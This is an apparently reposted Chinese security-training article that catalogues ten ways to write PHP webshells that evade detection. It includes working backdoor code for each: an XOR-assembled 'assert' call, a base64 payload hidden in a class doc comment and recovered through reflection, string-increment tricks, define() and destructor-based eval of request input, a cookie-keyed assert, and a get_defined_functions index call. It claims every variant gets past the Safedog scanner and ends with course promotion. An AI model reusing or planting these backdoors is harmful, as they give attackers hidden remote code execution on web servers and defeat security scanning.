文库|PHP的Webshell绕过总结

  • A+
所属分类:安全文章

高质量的安全文章,安全offer面试经验分享

尽在 # 掌控安全EDU #



作者:掌控安全-手电筒

1.php的异或运算


  1. $a="~+d()"^"!{+{}"

这个表示了$a=这两个字符串之间进行一个异或运算


运算异或运算符,按二进制位进行异或运算


这里的运算会把符号转化为ascii码,再转化为二进制,再转化为十进制进行运算,再把结果转化为ascii码


通过这个转换的方式来绕过检测


  1. <?php

  2. $a= ("!"^"@").'ssert';

  3. $a($_REQUEST[x]);

  4. ?>

测试可以成功连接


文库|PHP的Webshell绕过总结

2.通过获取注释去绕过


  1. <?php


  2. /**

  3. YXNzZXJ0YmZnZmc=

  4. */

  5. class Example

  6. {

  7. public function fn()

  8. {

  9. }

  10. }

  11. 通过一个空的类去获取,

  12. $reflector = new ReflectionClass('Example'); //这里为通过反射获取类的注释


  13. $zhushi = substr(($reflector->getDocComment()), 7, 12);然后去截断获取注释里的字符,注意getDocComment只能通过文件最开始的类来调用才会把注释内容显示

  14. //echo $zhushi;

  15. $zhushi = base64_decode($zhushi);

  16. $zhushi = substr($zhushi, 0, 6);


  17. echo $zhushi;


  18. foreach (array('_POST','_GET') as $_request) {

  19. foreach ($$_request as $_key=>$_value) {

  20. $$_key= $_value;

  21. print_r($$_request);

  22. }

  23. }

  24. /*设置一个数组,参数为_POST,_GET,然后把该数组用$_request去表示,再设置一个遍历,把$_request设为一个可变变量,再键值分离

  25. 再设$$_key=$_value,做一个定义,定义可变变量$_key键等于值得内容再设$$_key=$_value,做一个定义,定义可变变量$_key键等于值得内容

  26. */

  27. $zhushi($_value);

  28. //最后就是assert(传入的变量值)

  29. ?>

原理就是通过把shell加密并放到注释里,利用类的反射机制获取类的注释,再解密去生成shell


测试可以成功连接


文库|PHP的Webshell绕过总结

3.利用字符的运算符

  1. <?php

  2. $__="assers";

  3. ++$__;

  4. //echo ++$__;

  5. $__($_REQUEST[x]);

  6. ?>

设$__ 为字符串assers,然后对这个字符串进行自增操作


这里++是直接对这个字符串里的最后一个字符进行自增操作,得到结果为assert


然后去拼接($_REQUEST[x]);,生成shell


测试可以正常连接
文库|PHP的Webshell绕过总结

4.通过end函数代替[]


  1. <?php eval(end($_REQUEST));?>

这里的end函数的作用是输出数组中当前元素和最后一个元素的值


这里由于传参就一个,所以就直接输出我们传参的值,从而可以传入参数,这里就是我们传入参数相当于shell里的传参


测试可以正常连接


文库|PHP的Webshell绕过总结

5.通过常量去绕过


  1. <?php define("a","$_GET[1]");eval(a);?>

这里的关键在于define函数,这个函数的作用是定义一个常量


我们这里设置一个常量为a,它的值是$_GET[1],然后再去eval执行常量a,实际就是eval($_GET[1]);,从而达到绕过的目的


测试可以正常连接


文库|PHP的Webshell绕过总结

6.字符串拼接+双美元符


  1. <?php

  2. $a='ass';

  3. $b='ert';

  4. $funcName=$a.$b;

  5. $x='funcName';

  6. $$x($_REQUEST[1]);

  7. ?>

这里通过把关键的assert进行分割,然后拼接


再通过$$,利用可变变量去执行


测试可以正常连接


文库|PHP的Webshell绕过总结

7.通过函数定义绕过


  1. <?php

  2. function a($a){

  3. return $a;}

  4. eval(a($_REQUEST)[1]);

  5. ?>

这里设置一个用户自定义函数a,当里面有参数时,返回该参数的内容


这里shell里的a($_REQUEST)[1] 的实际效果为 a($_REQUEST)


相当于是a($a),会返回$a的内容


结果为$_REQUEST,最后一行的实际内容为eval($_REQUEST[1]);


测试可以正常连接

文库|PHP的Webshell绕过总结

8.通过类定义,然后传参分割


  1. <?php


  2. class User

  3. {

  4. public $name = '';

  5. function __destruct(){

  6. eval("$this->name");

  7. }

  8. }

  9. $user = new User;

  10. $user->name = ''.$_REQUEST[1];

  11. ?>

通过类定义,定义一个类User,设置$name为空,然后设置一个析构函数,脚本运行结束之前会调用对象,然后eval去执行,后面用new函数将对象实例化并输出方法,


然后,$user->name这个相当于是$this->name,等于’’.$_REQUEST[1];


最后$user->name = ‘’.$_REQUEST[1]; 


相当于eval($_REQUEST[1])


测试可以正常连接


文库|PHP的Webshell绕过总结

9.多传参方式绕过


  1. <?php

  2. $COOKIE = $_COOKIE;

  3. foreach($COOKIE as $key => $value){

  4. if($key=='assert'){

  5. $key($_REQUEST['s']);

  6. }

  7. }


  8. ?>

这里设置$cookie为获取的cookie传参,这里是个数组,然后通过foreach遍历,再进行键值分离,$key为键,$value为值


然后进行一个if判断,当$key为assert时,$key拼接($_REQUEST[‘s’]); 达到生成shell效果


测试可以正常连接


文库|PHP的Webshell绕过总结
文库|PHP的Webshell绕过总结

10.通过get_defined_functions绕过


  1. <?php

  2. $a=get_defined_functions();

  3. $a['internal'][841]($_GET['a']);

  4. ?>

这个get_defined_functions函数作用是返回所有已定义的函数,包括内置函数和用户定义的函数,这里通过get_defined_functions得到所有函数,


然后通过[‘internal’][841]去访问并调用相应函数,然后后接($_GET[‘a’]),生成shell


测试可以正常连接


文库|PHP的Webshell绕过总结

用安全狗进行检测


文库|PHP的Webshell绕过总结

文库|PHP的Webshell绕过总结
以上方案里的均能过安全狗

关于webshell绕过其实还有许多其他的办法,后续学习到了新方法会继续在本文的基础上做补充,再会!



回顾往期内容

Xray挂机刷漏洞

POC批量验证Python脚本编写

实战纪实 | SQL漏洞实战挖掘技巧

渗透工具 | 红队常用的那些工具分享

代码审计 | 这个CNVD证书拿的有点轻松

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

文库|PHP的Webshell绕过总结


扫码白嫖视频+工具+进群+靶场等资料


文库|PHP的Webshell绕过总结

 


文库|PHP的Webshell绕过总结

 扫码白嫖


 还有免费的配套靶场交流群哦!


本文始发于微信公众号(掌控安全EDU):文库|PHP的Webshell绕过总结

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: